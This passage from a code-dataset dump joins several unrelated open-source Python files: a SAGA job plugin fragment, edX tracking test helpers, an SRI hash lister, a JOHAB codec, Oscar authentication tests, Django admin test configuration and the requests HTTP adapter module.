job = bliss.saga.job.Job()
job._Job__init_from_service(service_obj=service_obj,
job_desc=job_description)
self.bookkeeper.add_job_object(job, service_obj)
self.log_info("service.create_job() called")
return job
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess,
"Couldn't create a new job because: %s " % (str(ex)))
def service_list(self, service_obj):
'''Implements interface from _JobPluginBase'''
self.log_info("service.list() calle")
try:
return self.bookkeeper.list_jobs_for_service(service_obj)
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't retreive job list because: %s " % (str(ex)))
return list()
def service_get_job(self, service_obj, job_id):
'''Implements interface from _JobPluginBase'''
self.log_info("service.get_job() called")
try:
return self.bookkeeper.get_job_for_jobid(service_obj, job_id)
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't get job list because: %s " % (str(ex)))
return None
def job_get_state(self, job):
'''Implements interface from _JobPluginBase'''
self.log_info("job.get_state() called")
try:
service = self.bookkeeper.get_service_for_job(job)
return self.bookkeeper.get_process_for_job(job).getstate()
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't get job state because: %s " % (str(ex)))
return bliss.saga.job.Job.Unknown
def job_get_job_id(self, job):
'''Implements interface from _JobPluginBase'''
self.log_info("job.get_job_id() called")
try:
service = self.bookkeeper.get_service_for_job(job)
return self.bookkeeper.get_process_for_job(job).getpid(str(service._url))
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't get job id because: %s " % (str(ex)))
return "ERROR"
def job_run(self, job):
'''Implements interface from _JobPluginBase'''
if job.get_description().executable is None:
self.log_error_and_raise(bliss.saga.Error.BadParameter, "No executable defined in job description")
try:
service = self.bookkeeper.get_service_for_job(job)
self.log_info("job.run() called with %s" % service._url)
self.bookkeeper.get_process_for_job(job).run(job.get_description(), service._url)
self.log_info("Started process: %s %s" % (job.get_description().executable, job.get_description().arguments))
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't run job because: %s " % (str(ex)))
def job_cancel(self, job, timeout):
'''Implements interface from _JobPluginBase'''
self.log_info("job.cancel() called")
try:
service = self.bookkeeper.get_service_for_job(job)
self.bookkeeper.get_process_for_job(job).terminate()
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't terminate job because: %s " % (str(ex)))
def job_wait(self, job, timeout):
'''Implements interface from _JobPluginBase'''
self.log_info("job.wait() called")
try:
service = self.bookkeeper.get_service_for_job(job)
self.bookkeeper.get_process_for_job(job).wait(timeout)
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't wait for the job because: %s " % (str(ex)))
def job_get_exitcode(self, job_obj):
'''Implements interface from _JobPluginBase'''
self.log_info("job.get_exitcode() called")
try:
#service = self.bookkeeper.get_service_for_job(job_obj)
#process = self.bookkeeper.get_process_for_job(job_obj)
#jobstate = process.getstate()
#if jobstate != bliss.saga.Job.Done or jobstate != bliss.saga.job.Failed:
# self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't get the job's exitcode. Job must be in 'Done' or 'Failed' state.")
#else:
return self.bookkeeper.get_process_for_job(job_obj).get_exitcode()
except Exception, ex:
self.log_error_and_raise(bliss.saga.Error.NoSuccess, "Couldn't get exitcode for job because: %s " % (str(ex)))
|
antonve/s4-project-mooc | refs/heads/master | common/djangoapps/track/tests/__init__.py | 150 | """Helpers for tests related to emitting events to the tracking logs."""
from datetime import datetime
from django.test import TestCase
from django.test.utils import override_settings
from freezegun import freeze_time
from pytz import UTC
from eventtracking import tracker
from eventtracking.django import DjangoTracker
# All events emitted during tests are frozen to this instant so that
# timestamp assertions are deterministic.
FROZEN_TIME = datetime(2013, 10, 3, 8, 24, 55, tzinfo=UTC)
# Tracker configuration routing every event to the in-memory backend
# defined below, registered under the name "mem".
IN_MEMORY_BACKEND_CONFIG = {
    'mem': {
        'ENGINE': 'track.tests.InMemoryBackend'
    }
}
class InMemoryBackend(object):
    """Event-tracking backend that keeps every sent event in memory.

    Tests inspect the ``events`` list to assert on emitted events.
    """
    def __init__(self):
        super(InMemoryBackend, self).__init__()
        self.events = []
    def send(self, event):
        """Record *event* for later inspection; nothing leaves the process."""
        self.events.append(event)
@freeze_time(FROZEN_TIME)
@override_settings(
    EVENT_TRACKING_BACKENDS=IN_MEMORY_BACKEND_CONFIG
)
class EventTrackingTestCase(TestCase):
    """
    Supports capturing of emitted events in memory and inspecting them.

    Each test gets a "clean slate" and can retrieve any events emitted during their execution.
    """

    # Make this more robust to the addition of new events that the test doesn't care about.

    def setUp(self):
        super(EventTrackingTestCase, self).setUp()
        self.recreate_tracker()

    def recreate_tracker(self):
        """
        Re-initialize the tracking system using updated django settings.

        Use this if you make use of the @override_settings decorator to customize the tracker configuration.
        """
        self.tracker = DjangoTracker()
        tracker.register_tracker(self.tracker)

    @property
    def backend(self):
        """A reference to the in-memory backend that stores the events."""
        return self.tracker.backends['mem']

    def get_event(self, idx=0):
        """Retrieve an event emitted up to this point in the test."""
        return self.backend.events[idx]

    def assert_no_events_emitted(self):
        """Ensure no events were emitted at this point in the test."""
        # assertEqual: assertEquals is a deprecated alias removed from
        # unittest in newer Python versions.
        self.assertEqual(len(self.backend.events), 0)

    def assert_events_emitted(self):
        """Ensure at least one event has been emitted at this point in the test."""
        self.assertGreaterEqual(len(self.backend.events), 1)
|
globau/servo | refs/heads/master | tests/wpt/web-platform-tests/subresource-integrity/tools/list_hashes.py | 191 | from os import path, listdir
from hashlib import sha512, sha384, sha256, md5
from base64 import b64encode
import re
DIR = path.normpath(path.join(__file__, "..", ".."))
'''
Yield each javascript and css file in the directory
'''
def js_and_css_files():
    """Yield each JavaScript and CSS filename found in the test directory.

    Bug fix: os.listdir() returns bare names, so the isfile() check must be
    made against the full path inside DIR -- the previous code tested the
    name relative to the current working directory and silently yielded
    nothing when the script was run from anywhere else.
    """
    for f in listdir(DIR):
        if path.isfile(path.join(DIR, f)) and (f.endswith(".js") or f.endswith(".css")):
            yield f
'''
URL-safe base64 encode a binary digest and strip any padding.
'''
def format_digest(digest):
    """Base64-encode a raw binary digest for use in an integrity token."""
    encoded = b64encode(digest)
    return encoded
'''
Generate an encoded sha512 URI.
'''
def sha512_uri(content):
    """Return a subresource-integrity token of the form ``sha512-<base64>``."""
    digest = sha512(content).digest()
    return "sha512-%s" % format_digest(digest)
'''
Generate an encoded sha384 URI.
'''
def sha384_uri(content):
    """Return a subresource-integrity token of the form ``sha384-<base64>``."""
    digest = sha384(content).digest()
    return "sha384-%s" % format_digest(digest)
'''
Generate an encoded sha256 URI.
'''
def sha256_uri(content):
    """Return a subresource-integrity token of the form ``sha256-<base64>``."""
    digest = sha256(content).digest()
    return "sha256-%s" % format_digest(digest)
'''
Generate an encoded md5 digest URI.
'''
def md5_uri(content):
    """Return an (intentionally weak, for negative tests) ``md5-<base64>`` token."""
    digest = md5(content).digest()
    return "md5-%s" % format_digest(digest)
def main():
    # For every .js/.css file, print the integrity tokens a test author can
    # paste into SRI test cases.  Python 2 code (print statements).
    # NOTE(review): open(file, ...) uses the bare name -- works only when
    # the script is run from the tests directory itself.
    for file in js_and_css_files():
        print "Listing hash values for %s" % file
        with open(file, "r") as content_file:
            content = content_file.read()
        print "\tSHA512 integrity: %s" % sha512_uri(content)
        print "\tSHA384 integrity: %s" % sha384_uri(content)
        print "\tSHA256 integrity: %s" % sha256_uri(content)
        print "\tMD5 integrity: %s" % md5_uri(content)
# Run only when executed as a script (not on import).
if __name__ == "__main__":
    main()
|
ivan-fedorov/intellij-community | refs/heads/master | python/lib/Lib/encodings/johab.py | 816 | #
# johab.py: Python Unicode Codec for JOHAB
#
# Written by Hye-Shik Chang <perky@FreeBSD.org>
#
import _codecs_kr, codecs
import _multibytecodec as mbc
codec = _codecs_kr.getcodec('johab')
class Codec(codecs.Codec):
    # Stateless encode/decode delegated to the C JOHAB codec object.
    encode = codec.encode
    decode = codec.decode
class IncrementalEncoder(mbc.MultibyteIncrementalEncoder,
                         codecs.IncrementalEncoder):
    # Stateful encoder; the multibyte base class buffers split sequences.
    codec = codec
class IncrementalDecoder(mbc.MultibyteIncrementalDecoder,
                         codecs.IncrementalDecoder):
    # Stateful decoder; the multibyte base class buffers split sequences.
    codec = codec
class StreamReader(Codec, mbc.MultibyteStreamReader, codecs.StreamReader):
    # Stream reader; multibyte handling comes from the C-backed base class.
    codec = codec
class StreamWriter(Codec, mbc.MultibyteStreamWriter, codecs.StreamWriter):
    # Stream writer; multibyte handling comes from the C-backed base class.
    codec = codec
def getregentry():
    # Registration hook consumed by the encodings package search function.
    return codecs.CodecInfo(
        name='johab',
        encode=Codec().encode,
        decode=Codec().decode,
        incrementalencoder=IncrementalEncoder,
        incrementaldecoder=IncrementalDecoder,
        streamreader=StreamReader,
        streamwriter=StreamWriter,
    )
|
sumanthha/fundafriend | refs/heads/master | django/conf/locale/sl/__init__.py | 12133432 | |
mdn/webalyzer | refs/heads/master | webalyzer/collected/migrations/__init__.py | 12133432 | |
lig/picket2014 | refs/heads/master | users/management/commands/__init__.py | 12133432 | |
ahmetdaglarbas/e-commerce | refs/heads/tez | tests/functional/customer/auth_tests.py | 53 | import re
from django.core import mail
from django.core.urlresolvers import reverse
from django_webtest import WebTest
from oscar.test.testcases import WebTestCase
from oscar.test import factories
from oscar.core.compat import get_user_model
User = get_user_model()
class TestAUserWhoseForgottenHerPassword(WebTest):
    """End-to-end password-reset flow: request the reset email, follow the
    emailed link, set a new password, and log in with it."""

    def test_can_reset_her_password(self):
        username, email, password = 'lucy', 'lucy@example.com', 'password'
        User.objects.create_user(username, email, password)

        # Fill in password reset form
        page = self.app.get(reverse('password-reset'))
        form = page.forms['password_reset_form']
        form['email'] = email
        response = form.submit()

        # Response should be a redirect and an email should have been sent
        self.assertEqual(302, response.status_code)
        self.assertEqual(1, len(mail.outbox))

        # Extract URL from email.  Fix: the MULTILINE flag belongs in
        # re.compile -- Pattern.search()'s second positional argument is the
        # start position, so the old search(body, re.MULTILINE) silently
        # began matching at index 8 instead of setting a flag.
        email_body = mail.outbox[0].body
        urlfinder = re.compile(
            r"http://example.com(?P<path>[-A-Za-z0-9\/\._]+)", re.MULTILINE)
        matches = urlfinder.search(email_body)
        self.assertTrue('path' in matches.groupdict())
        path = matches.groupdict()['path']

        # Reset password and check we get redirect
        reset_page = self.app.get(path)
        form = reset_page.forms['password_reset_form']
        form['new_password1'] = 'crazymonkey'
        form['new_password2'] = 'crazymonkey'
        response = form.submit()
        self.assertEqual(302, response.status_code)

        # Now attempt to login with new password
        url = reverse('customer:login')
        form = self.app.get(url).forms['login_form']
        form['login-username'] = email
        form['login-password'] = 'crazymonkey'
        response = form.submit('login_submit')
        self.assertEqual(302, response.status_code)
class TestAnAuthenticatedUser(WebTestCase):
    """Behaviour of account pages for a logged-in customer, in particular
    which actions trigger a notification email."""
    is_anonymous = False
    def test_receives_an_email_when_their_password_is_changed(self):
        page = self.get(reverse('customer:change-password'))
        form = page.forms['change_password_form']
        form['old_password'] = self.password
        form['new_password1'] = u'anotherfancypassword'
        form['new_password2'] = u'anotherfancypassword'
        page = form.submit()
        self.assertEqual(len(mail.outbox), 1)
        self.assertIn("your password has been changed", mail.outbox[0].body)
    def test_cannot_access_reset_password_page(self):
        # The anonymous-only reset page returns 403 for signed-in users.
        response = self.get(reverse('password-reset'), status=403)
        self.assertEqual(403, response.status_code)
    def test_does_not_receive_an_email_when_their_profile_is_updated_but_email_address_not_changed(self):
        page = self.get(reverse('customer:profile-update'))
        form = page.forms['profile_form']
        form['first_name'] = "Terry"
        form.submit()
        self.assertEqual(len(mail.outbox), 0)
    def test_receives_an_email_when_their_email_address_is_changed(self):
        # The notification goes to the OLD address while the account is
        # updated to the new one.
        page = self.get(reverse('customer:profile-update'))
        form = page.forms['profile_form']
        new_email = 'a.new.email@user.com'
        form['email'] = new_email
        page = form.submit()
        self.assertEqual(len(mail.outbox), 1)
        self.assertEqual(mail.outbox[0].to[0], self.email)
        self.assertEqual(User.objects.get(id=self.user.id).email, new_email)
        self.assertIn("your email address has been changed",
                      mail.outbox[0].body)
class TestAnAnonymousUser(WebTestCase):
    """Login and registration behaviour for visitors without an account,
    including email-address case handling."""
    is_anonymous = True
    def assertCanLogin(self, email, password):
        # Helper: submit the login form and expect a redirect to the
        # account summary page.
        url = reverse('customer:login')
        form = self.app.get(url).forms['login_form']
        form['login-username'] = email
        form['login-password'] = password
        response = form.submit('login_submit')
        self.assertRedirectsTo(response, 'customer:summary')
    def test_can_login(self):
        email, password = 'd@d.com', 'mypassword'
        User.objects.create_user('_', email, password)
        self.assertCanLogin(email, password)
    def test_can_login_with_email_containing_capitals_in_local_part(self):
        email, password = 'Andrew.Smith@test.com', 'mypassword'
        User.objects.create_user('_', email, password)
        self.assertCanLogin(email, password)
    def test_can_login_with_email_containing_capitals_in_host(self):
        email, password = 'Andrew.Smith@teSt.com', 'mypassword'
        User.objects.create_user('_', email, password)
        self.assertCanLogin(email, password)
    def test_can_register(self):
        url = reverse('customer:register')
        form = self.app.get(url).forms['register_form']
        form['email'] = 'terry@boom.com'
        form['password1'] = form['password2'] = 'hedgehog'
        response = form.submit()
        self.assertRedirectsTo(response, 'customer:summary')
    def test_casing_of_local_part_of_email_is_preserved(self):
        # Only the host part is normalised to lowercase on registration.
        url = reverse('customer:register')
        form = self.app.get(url).forms['register_form']
        form['email'] = 'Terry@Boom.com'
        form['password1'] = form['password2'] = 'hedgehog'
        form.submit()
        user = User.objects.all()[0]
        self.assertEqual(user.email, 'Terry@boom.com')
class TestAStaffUser(WebTestCase):
    """Staff members should land on the dashboard, not the customer area."""
    is_anonymous = True
    password = 'testing'
    def setUp(self):
        # Create the staff account before the base class logs anyone in.
        self.staff = factories.UserFactory.create(
            password=self.password, is_staff=True)
        super(TestAStaffUser, self).setUp()
    def test_gets_redirected_to_the_dashboard_when_they_login(self):
        page = self.get(reverse('customer:login'))
        form = page.forms['login_form']
        form['login-username'] = self.staff.email
        form['login-password'] = self.password
        response = form.submit('login_submit')
        self.assertRedirectsTo(response, 'dashboard:index')
|
archen/django | refs/heads/master | tests/admin_changelist/admin.py | 57 | from django.contrib import admin
from django.core.paginator import Paginator
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.models import User
from .models import Event, Child, Parent, Swallow
site = admin.AdminSite(name="admin")
site.register(User, UserAdmin)
class CustomPaginator(Paginator):
    # Test double: deliberately ignores the admin-supplied page_size and
    # always paginates 5 per page with 2 orphans, so tests can verify the
    # custom paginator class was actually used.
    def __init__(self, queryset, page_size, orphans=0, allow_empty_first_page=True):
        super(CustomPaginator, self).__init__(queryset, 5, orphans=2,
            allow_empty_first_page=allow_empty_first_page)
class EventAdmin(admin.ModelAdmin):
    # Exercises a list_display entry that is an admin method rather than a
    # model field name.
    list_display = ['event_date_func']
    def event_date_func(self, event):
        # Column callable: expose the event's date.
        return event.date
site.register(Event, EventAdmin)
class ParentAdmin(admin.ModelAdmin):
    # Filtering and searching across a relation (child__name).
    list_filter = ['child__name']
    search_fields = ['child__name']
class ChildAdmin(admin.ModelAdmin):
    list_display = ['name', 'parent']
    list_per_page = 10
    list_filter = ['parent', 'age']
    def get_queryset(self, request):
        # NOTE(review): select_related() normally takes relation names;
        # "parent__name" ends on a plain field -- confirm this is deliberate
        # test input (newer Django versions raise FieldError for it).
        return super(ChildAdmin, self).get_queryset(request).select_related("parent__name")
class CustomPaginationAdmin(ChildAdmin):
    # Same as ChildAdmin but paginated by the fixed-size CustomPaginator.
    paginator = CustomPaginator
class FilteredChildAdmin(admin.ModelAdmin):
    list_display = ['name', 'parent']
    list_per_page = 10
    def get_queryset(self, request):
        # Restrict the changelist to objects whose name contains 'filtered',
        # so tests can check that get_queryset() customisation is honoured.
        return super(FilteredChildAdmin, self).get_queryset(request).filter(
            name__contains='filtered')
class BandAdmin(admin.ModelAdmin):
    # Filtering on the genres relation.
    list_filter = ['genres']
class GroupAdmin(admin.ModelAdmin):
    # Filtering on the members relation.
    list_filter = ['members']
class QuartetAdmin(admin.ModelAdmin):
    # Filtering on the members relation.
    list_filter = ['members']
class ChordsBandAdmin(admin.ModelAdmin):
    # Filtering on the members relation.
    list_filter = ['members']
class InvitationAdmin(admin.ModelAdmin):
    # Exercises list_select_related given as an explicit tuple of relations.
    list_display = ('band', 'player')
    list_select_related = ('player',)
class DynamicListDisplayChildAdmin(admin.ModelAdmin):
    # get_list_display() varies per request: the 'noparents' user does not
    # see the parent column.
    list_display = ('parent', 'name', 'age')
    def get_list_display(self, request):
        my_list_display = super(DynamicListDisplayChildAdmin, self).get_list_display(request)
        if request.user.username == 'noparents':
            # Copy before mutating: the class attribute is a shared tuple.
            my_list_display = list(my_list_display)
            my_list_display.remove('parent')
        return my_list_display
class DynamicListDisplayLinksChildAdmin(admin.ModelAdmin):
    list_display = ('parent', 'name', 'age')
    list_display_links = ['parent', 'name']
    def get_list_display_links(self, request, list_display):
        # Dynamically override the class attribute: only 'age' is linked.
        return ['age']
site.register(Child, DynamicListDisplayChildAdmin)
class NoListDisplayLinksParentAdmin(admin.ModelAdmin):
    # None disables row links entirely (no column links to the change form).
    list_display_links = None
site.register(Parent, NoListDisplayLinksParentAdmin)
class SwallowAdmin(admin.ModelAdmin):
    actions = None  # prevent ['action_checkbox'] + list(list_display)
    list_display = ('origin', 'load', 'speed')
site.register(Swallow, SwallowAdmin)
class DynamicListFilterChildAdmin(admin.ModelAdmin):
    """Changelist whose sidebar filters depend on the requesting user."""
    list_filter = ('parent', 'name', 'age')

    def get_list_filter(self, request):
        # The special 'noparents' user does not get the parent filter.
        filters = super(DynamicListFilterChildAdmin, self).get_list_filter(request)
        if request.user.username == 'noparents':
            filters = [spec for spec in filters if spec != 'parent']
        return filters
class DynamicSearchFieldsChildAdmin(admin.ModelAdmin):
    """Adds 'age' to the searchable fields at request time."""
    search_fields = ('name',)

    def get_search_fields(self, request):
        base = super(DynamicSearchFieldsChildAdmin, self).get_search_fields(request)
        return base + ('age',)
|
terbolous/CouchPotatoServer | refs/heads/master | libs/requests/adapters.py | 293 | # -*- coding: utf-8 -*-
"""
requests.adapters
~~~~~~~~~~~~~~~~~
This module contains the transport adapters that Requests uses to define
and maintain connections.
"""
import socket
from .models import Response
from .packages.urllib3.poolmanager import PoolManager, proxy_from_url
from .packages.urllib3.response import HTTPResponse
from .packages.urllib3.util import Timeout as TimeoutSauce
from .compat import urlparse, basestring, urldefrag, unquote
from .utils import (DEFAULT_CA_BUNDLE_PATH, get_encoding_from_headers,
prepend_scheme_if_needed, get_auth_from_url)
from .structures import CaseInsensitiveDict
from .packages.urllib3.exceptions import MaxRetryError
from .packages.urllib3.exceptions import TimeoutError
from .packages.urllib3.exceptions import SSLError as _SSLError
from .packages.urllib3.exceptions import HTTPError as _HTTPError
from .packages.urllib3.exceptions import ProxyError as _ProxyError
from .cookies import extract_cookies_to_jar
from .exceptions import ConnectionError, Timeout, SSLError, ProxyError
from .auth import _basic_auth_str
# Defaults for urllib3 connection-pool construction; see
# HTTPAdapter.__init__ / init_poolmanager below.
DEFAULT_POOLBLOCK = False
DEFAULT_POOLSIZE = 10
DEFAULT_RETRIES = 0
class BaseAdapter(object):
    """The Base Transport Adapter.

    Defines the interface that Session uses to dispatch requests; concrete
    adapters (e.g. :class:`HTTPAdapter`) must implement ``send`` and
    ``close``.
    """

    def __init__(self):
        super(BaseAdapter, self).__init__()

    def send(self, request, stream=False, timeout=None, verify=True,
             cert=None, proxies=None):
        """Sends PreparedRequest object. Returns Response object.

        Signature mirrors HTTPAdapter.send so callers invoking the base
        interface get NotImplementedError rather than a TypeError about
        unexpected arguments.

        :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
        :param stream: (optional) Whether to stream the request content.
        :param timeout: (optional) The timeout on the request.
        :param verify: (optional) Whether to verify SSL certificates.
        :param cert: (optional) Any user-provided SSL certificate to be trusted.
        :param proxies: (optional) The proxies dictionary to apply to the request.
        """
        raise NotImplementedError

    def close(self):
        """Cleans up adapter specific items."""
        raise NotImplementedError
class HTTPAdapter(BaseAdapter):
    """The built-in HTTP Adapter for urllib3.
    Provides a general-case interface for Requests sessions to contact HTTP and
    HTTPS urls by implementing the Transport Adapter interface. This class will
    usually be created by the :class:`Session <Session>` class under the
    covers.
    :param pool_connections: The number of urllib3 connection pools to cache.
    :param pool_maxsize: The maximum number of connections to save in the pool.
    :param int max_retries: The maximum number of retries each connection
        should attempt. Note, this applies only to failed connections and
        timeouts, never to requests where the server returns a response.
    :param pool_block: Whether the connection pool should block for connections.
    Usage::
      >>> import requests
      >>> s = requests.Session()
      >>> a = requests.adapters.HTTPAdapter(max_retries=3)
      >>> s.mount('http://', a)
    """
    __attrs__ = ['max_retries', 'config', '_pool_connections', '_pool_maxsize',
                 '_pool_block']

    def __init__(self, pool_connections=DEFAULT_POOLSIZE,
                 pool_maxsize=DEFAULT_POOLSIZE, max_retries=DEFAULT_RETRIES,
                 pool_block=DEFAULT_POOLBLOCK):
        self.max_retries = max_retries
        self.config = {}
        self.proxy_manager = {}
        super(HTTPAdapter, self).__init__()
        self._pool_connections = pool_connections
        self._pool_maxsize = pool_maxsize
        self._pool_block = pool_block
        self.init_poolmanager(pool_connections, pool_maxsize, block=pool_block)

    def __getstate__(self):
        return dict((attr, getattr(self, attr, None)) for attr in
                    self.__attrs__)

    def __setstate__(self, state):
        # Can't handle by adding 'proxy_manager' to self.__attrs__ because
        # self.poolmanager uses a lambda function, which isn't pickleable.
        self.proxy_manager = {}
        self.config = {}
        for attr, value in state.items():
            setattr(self, attr, value)
        self.init_poolmanager(self._pool_connections, self._pool_maxsize,
                              block=self._pool_block)

    def init_poolmanager(self, connections, maxsize, block=DEFAULT_POOLBLOCK):
        """Initializes a urllib3 PoolManager. This method should not be called
        from user code, and is only exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param connections: The number of urllib3 connection pools to cache.
        :param maxsize: The maximum number of connections to save in the pool.
        :param block: Block when no free connections are available.
        """
        # save these values for pickling
        self._pool_connections = connections
        self._pool_maxsize = maxsize
        self._pool_block = block
        self.poolmanager = PoolManager(num_pools=connections, maxsize=maxsize,
                                       block=block)

    def cert_verify(self, conn, url, verify, cert):
        """Verify a SSL certificate. This method should not be called from user
        code, and is only exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param conn: The urllib3 connection object associated with the cert.
        :param url: The requested URL.
        :param verify: Whether we should actually verify the certificate.
        :param cert: The SSL certificate to verify.
        """
        if url.lower().startswith('https') and verify:
            cert_loc = None
            # Allow self-specified cert location.
            if verify is not True:
                cert_loc = verify
            if not cert_loc:
                cert_loc = DEFAULT_CA_BUNDLE_PATH
            if not cert_loc:
                raise Exception("Could not find a suitable SSL CA certificate bundle.")
            conn.cert_reqs = 'CERT_REQUIRED'
            conn.ca_certs = cert_loc
        else:
            conn.cert_reqs = 'CERT_NONE'
            conn.ca_certs = None
        if cert:
            # A (cert, key) pair or a single combined cert file.
            if not isinstance(cert, basestring):
                conn.cert_file = cert[0]
                conn.key_file = cert[1]
            else:
                conn.cert_file = cert

    def build_response(self, req, resp):
        """Builds a :class:`Response <requests.Response>` object from a urllib3
        response. This should not be called from user code, and is only exposed
        for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`
        :param req: The :class:`PreparedRequest <PreparedRequest>` used to generate the response.
        :param resp: The urllib3 response object.
        """
        response = Response()
        # Fallback to None if there's no status_code, for whatever reason.
        response.status_code = getattr(resp, 'status', None)
        # Make headers case-insensitive.
        response.headers = CaseInsensitiveDict(getattr(resp, 'headers', {}))
        # Set encoding.
        response.encoding = get_encoding_from_headers(response.headers)
        response.raw = resp
        response.reason = response.raw.reason
        if isinstance(req.url, bytes):
            response.url = req.url.decode('utf-8')
        else:
            response.url = req.url
        # Add new cookies from the server.
        extract_cookies_to_jar(response.cookies, req, resp)
        # Give the Response some context.
        response.request = req
        response.connection = self
        return response

    def get_connection(self, url, proxies=None):
        """Returns a urllib3 connection for the given URL. This should not be
        called from user code, and is only exposed for use when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param url: The URL to connect to.
        :param proxies: (optional) A Requests-style dictionary of proxies used on this request.
        """
        proxies = proxies or {}
        proxy = proxies.get(urlparse(url.lower()).scheme)
        if proxy:
            proxy = prepend_scheme_if_needed(proxy, 'http')
            proxy_headers = self.proxy_headers(proxy)
            # Lazily build (and cache) one proxy manager per proxy URL.
            if proxy not in self.proxy_manager:
                self.proxy_manager[proxy] = proxy_from_url(
                    proxy,
                    proxy_headers=proxy_headers,
                    num_pools=self._pool_connections,
                    maxsize=self._pool_maxsize,
                    block=self._pool_block)
            conn = self.proxy_manager[proxy].connection_from_url(url)
        else:
            # Only scheme should be lower case
            parsed = urlparse(url)
            url = parsed.geturl()
            conn = self.poolmanager.connection_from_url(url)
        return conn

    def close(self):
        """Disposes of any internal state.
        Currently, this just closes the PoolManager, which closes pooled
        connections.
        """
        self.poolmanager.clear()

    def request_url(self, request, proxies):
        """Obtain the url to use when making the final request.
        If the message is being sent through a HTTP proxy, the full URL has to
        be used. Otherwise, we should only use the path portion of the URL.
        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
        :param proxies: A dictionary of schemes to proxy URLs.
        """
        proxies = proxies or {}
        scheme = urlparse(request.url).scheme
        proxy = proxies.get(scheme)
        if proxy and scheme != 'https':
            url, _ = urldefrag(request.url)
        else:
            url = request.path_url
        return url

    def add_headers(self, request, **kwargs):
        """Add any headers needed by the connection. As of v2.0 this does
        nothing by default, but is left for overriding by users that subclass
        the :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param request: The :class:`PreparedRequest <PreparedRequest>` to add headers to.
        :param kwargs: The keyword arguments from the call to send().
        """
        pass

    def proxy_headers(self, proxy):
        """Returns a dictionary of the headers to add to any request sent
        through a proxy. This works with urllib3 magic to ensure that they are
        correctly sent to the proxy, rather than in a tunnelled request if
        CONNECT is being used.
        This should not be called from user code, and is only exposed for use
        when subclassing the
        :class:`HTTPAdapter <requests.adapters.HTTPAdapter>`.
        :param proxies: The url of the proxy being used for this request.
        :param kwargs: Optional additional keyword arguments.
        """
        headers = {}
        username, password = get_auth_from_url(proxy)
        if username and password:
            headers['Proxy-Authorization'] = _basic_auth_str(username,
                                                             password)
        return headers

    def send(self, request, stream=False, timeout=None, verify=True, cert=None, proxies=None):
        """Sends PreparedRequest object. Returns Response object.
        :param request: The :class:`PreparedRequest <PreparedRequest>` being sent.
        :param stream: (optional) Whether to stream the request content.
        :param timeout: (optional) The timeout on the request.
        :param verify: (optional) Whether to verify SSL certificates.
        :param cert: (optional) Any user-provided SSL certificate to be trusted.
        :param proxies: (optional) The proxies dictionary to apply to the request.
        """
        conn = self.get_connection(request.url, proxies)
        self.cert_verify(conn, request.url, verify, cert)
        url = self.request_url(request, proxies)
        self.add_headers(request)
        # A body without a Content-Length header must be sent chunked.
        chunked = not (request.body is None or 'Content-Length' in request.headers)
        timeout = TimeoutSauce(connect=timeout, read=timeout)
        try:
            if not chunked:
                resp = conn.urlopen(
                    method=request.method,
                    url=url,
                    body=request.body,
                    headers=request.headers,
                    redirect=False,
                    assert_same_host=False,
                    preload_content=False,
                    decode_content=False,
                    retries=self.max_retries,
                    timeout=timeout
                )
            # Send the request.
            else:
                if hasattr(conn, 'proxy_pool'):
                    conn = conn.proxy_pool
                low_conn = conn._get_conn(timeout=timeout)
                try:
                    low_conn.putrequest(request.method,
                                        url,
                                        skip_accept_encoding=True)
                    for header, value in request.headers.items():
                        low_conn.putheader(header, value)
                    low_conn.endheaders()
                    # Hand-rolled chunked transfer encoding: hex length,
                    # CRLF, chunk, CRLF, then the zero-length terminator.
                    for i in request.body:
                        low_conn.send(hex(len(i))[2:].encode('utf-8'))
                        low_conn.send(b'\r\n')
                        low_conn.send(i)
                        low_conn.send(b'\r\n')
                    low_conn.send(b'0\r\n\r\n')
                    r = low_conn.getresponse()
                    resp = HTTPResponse.from_httplib(
                        r,
                        pool=conn,
                        connection=low_conn,
                        preload_content=False,
                        decode_content=False
                    )
                except:
                    # If we hit any problems here, clean up the connection.
                    # Then, reraise so that we can handle the actual exception.
                    low_conn.close()
                    raise
                else:
                    # All is well, return the connection to the pool.
                    conn._put_conn(low_conn)
        except socket.error as sockerr:
            raise ConnectionError(sockerr, request=request)
        except MaxRetryError as e:
            raise ConnectionError(e, request=request)
        except _ProxyError as e:
            raise ProxyError(e)
        except (_SSLError, _HTTPError) as e:
            if isinstance(e, _SSLError):
                raise SSLError(e, request=request)
            elif isinstance(e, TimeoutError):
                raise Timeout(e, request=request)
            else:
                raise
        return self.build_response(request, resp)
|
Actifio/docker-oracle-vclones | refs/heads/master | docker-bootstrap.py | 1 | # Copyright 2018 <Kosala Atapattu kosala.atapattu@actifio.com>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
